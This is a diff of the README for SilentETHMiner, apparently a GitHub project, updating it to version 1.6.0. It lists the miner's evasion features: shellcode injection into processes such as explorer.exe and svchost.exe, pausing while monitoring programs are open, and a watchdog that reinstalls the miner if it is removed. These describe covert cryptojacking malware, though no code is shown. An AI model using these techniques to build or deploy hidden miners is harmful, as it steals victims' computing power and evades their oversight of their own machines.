UnamSanctam/SilentETHMiner/README.md

 <img src="https://github.com/UnamSanctam/SilentETHMiner/blob/master/SilentETHMiner.png?raw=true">

-# SilentETHMiner v1.5.4 - Based on Lime Miner v0.3
+# SilentETHMiner v1.6.0 - Based on Lime Miner v0.3

 Can mine any Ethash or Etchash cryptocurrency.

 ## Main Features

-* .NET - Coded in C#, requires .NET Framework 4.5
+* Native & .NET - Miner installer and watchdog coded in C#, Shellcode loader/injector coded in C, miner requires .NET Framework 4.5
+* Shellcode - All .NET C# parts are converted into Shellcode and injected using a native C loader, can be disabled
-* Injection (Silent/Hidden) - Hide payload behind another process like explorer.exe, conhost.exe, svchost.exe or some other process
+* Injection (Silent/Hidden) - Hide payload behind another process like explorer.exe, conhost.exe, svchost.exe or other processes
 * Idle Mining - Can be configured to mine at different usages or not at all while computer is or isn't in use
 * Stealth - Pauses the miner and clears the GPU memory while any of the programs in the "Stealth Targets" option are open
 * Watchdog - Replaces the miner file if removed and starts it if the injected miner is closed down